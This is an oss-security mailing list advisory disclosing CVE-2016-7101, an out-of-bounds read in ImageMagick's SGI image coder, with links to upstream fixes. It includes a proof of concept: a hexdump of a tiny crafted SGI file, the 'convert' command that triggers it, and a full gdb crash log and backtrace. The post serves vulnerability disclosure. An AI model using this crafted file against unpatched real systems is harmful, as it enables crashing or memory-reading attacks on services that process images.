'[oss-security] CVE-2016-7101 - ImageMagick SGI Coder Out-Of-Bounds Read Vulnerability'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] CVE-2016-7101 - ImageMagick SGI Coder Out-Of-Bounds Read Vulnerability
From:       <pwchen () tencent ! com>
Date:       2016-09-26 7:54:24
Message-ID: 2A704EDCB5C64F40AF988060A961492BBB3B0E () EXMBX-TJ007 ! tencent ! com
[Download RAW message or body]

[Attachment #2 (text/plain)]

Hi.

This is PeiwenChen of Tencent's Xuanwu Lab & RayZhong of Tencent's Keen Lab.
During our research, we found an Out-Of-Bounds write vulnerability in
 ImageMagick's SGI coder.

When ImageMagick is identifying SGI format image, we can craft a sgi file
with big value of row. It will read a certain number of times which is
controllable by value of row, It cause an Out-Of-Bounds Read.

The ImageMagick team has fixed the vulnerability we reported.


Upstream fix:
https://github.com/ImageMagick/ImageMagick/commit/7afcf9f71043df15508e46f079387bd4689a738d
https://github.com/ImageMagick/ImageMagick/commit/8f8959033e4e59418d6506b345829af1f7a71127

Debian Bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=836776


Attached is a proof of concept and backtrace.

$ hexdump PoC.sgi
0000000 da01 0100 0000 fffe 0200 0400
000000c

$ convert PoC.sgi


Program received signal SIGSEGV, Segmentation fault.
[------------------------registers------------------------]
RAX: 0x0
RBX: 0x1
RCX: 0xf939
RDX: 0x6031b0 --> 0x0
RSI: 0x7ffff7fe8090 --> 0x1
RDI: 0x7ffff7dcef98 --> 0x1
RBP: 0xdfbc
RSP: 0x7fffffff5e60 --> 0xffffffff54535254
RIP: 0x7ffff74eae8b (<IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4])
R8 : 0x744850 --> 0x0
R9 : 0x1
R10: 0x69a000 --> 0x0
R11: 0x1
R12: 0x641600 --> 0x600000000
R13: 0x6535f0 --> 0x1700000001
R14: 0x603178 --> 0x6031b0 --> 0x0

R15: 0x765000                          <== end address of heap

[---------------------------code---------------------------]
   0x7ffff74eae7d <IdentifyImageGray+781>: inc    BYTE PTR [rdx+rcx*1]
   0x7ffff74eae80 <IdentifyImageGray+784>: mov    DWORD PTR [rax],0x5177
   0x7ffff74eae86 <IdentifyImageGray+790>: mov    rax,QWORD PTR [rsp+0x30]
=> 0x7ffff74eae8b <IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4]
   0x7ffff74eae91 <IdentifyImageGray+801>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff74eae96 <IdentifyImageGray+806>: mov    rax,QWORD PTR [rsp+0x28]
   0x7ffff74eae9b <IdentifyImageGray+811>: movss  xmm4,DWORD PTR [r15+rax*4]
   0x7ffff74eaea1 <IdentifyImageGray+817>: subss  xmm0,xmm4
[---------------------------stack---------------------------]
00:0000| rsp 0x7fffffff5e60 --> 0xffffffff54535254
01:0008|     0x7fffffff5e68 --> 0x0
02:0016|     0x7fffffff5e70 --> 0x63d600 --> 0x6535f0 --> 0x1700000001
03:0024|     0x7fffffff5e78 --> 0x614160 --> 0x1a9
04:0032|     0x7fffffff5e80 --> 0x0
05:0040|     0x7fffffff5e88 --> 0x1
06:0048|     0x7fffffff5e90 --> 0x0
07:0056|     0x7fffffff5e98 --> 0xfeff
[-----------------------------------------------------------]
Legend: stack, code, data, heap, rodata, value
Stopped reason: SIGSEGV
0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at \
./MagickCore/pixel-accessor.h:561 561   red_green=(MagickRealType) \
pixel[image->channel_map[RedPixelChannel].offset]-

gdb-peda$ bt
#0  0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at \
./MagickCore/pixel-accessor.h:561 #1  IdentifyImageGray (image=<optimized out>, \
exception=<optimized out>) at MagickCore/attribute.c:683 #2  0x00007ffff74ebb7a in \
IdentifyImageType (image=0x6535f0, exception=0x614160) at MagickCore/attribute.c:821 #3  \
0x00007ffff7647d39 in IdentifyImage (image=0x6535f0, file=<optimized out>, verbose=<optimized \
out>, exception=0x614160) at MagickCore/identify.c:494 #4  0x00007ffff71024a6 in \
IdentifyImageCommand (image_info=<optimized out>, argc=<optimized out>, argv=<optimized out>, \
metadata=<optimized out>, exception=<optimized out>) at MagickWand/identify.c:336 #5  \
0x00007ffff7153e53 in MagickCommandGenesis (image_info=<optimized out>, command=<optimized \
out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, \
exception=<optimized out>) at MagickWand/mogrify.c:183 #6  0x0000000000401cae in MagickMain \
(argc=<optimized out>, argv=<optimized out>) at utilities/magick.c:145 #7  main \
(argc=<optimized out>, argv=<optimized out>, argv@entry=0x7fffffffeb48) at \
utilities/magick.c:176 #8  0x00007ffff5a3b830 in __libc_start_main (main=0x4015f0 <main>, \
argc=0x2, argv=0x7fffffffeb48, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized \
out>, stack_end=0x7fffffffeb38) at ../csu/libc-start.c:291 #9  0x0000000000401519 in _start ()


gdb-peda$ vmmap
Start              End                Perm Name
0x00400000         0x00403000         r-xp /usr/local/bin/magick
0x00602000         0x00603000         r--p /usr/local/bin/magick
0x00603000         0x00604000         rw-p /usr/local/bin/magick
0x00604000         0x00765000         rw-p [heap]
0x00007ffff553f000 0x00007ffff5817000 r--p /usr/lib/locale/locale-archive


Regards,
Peiwen Chen
Tencent's Xuanwu Lab



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic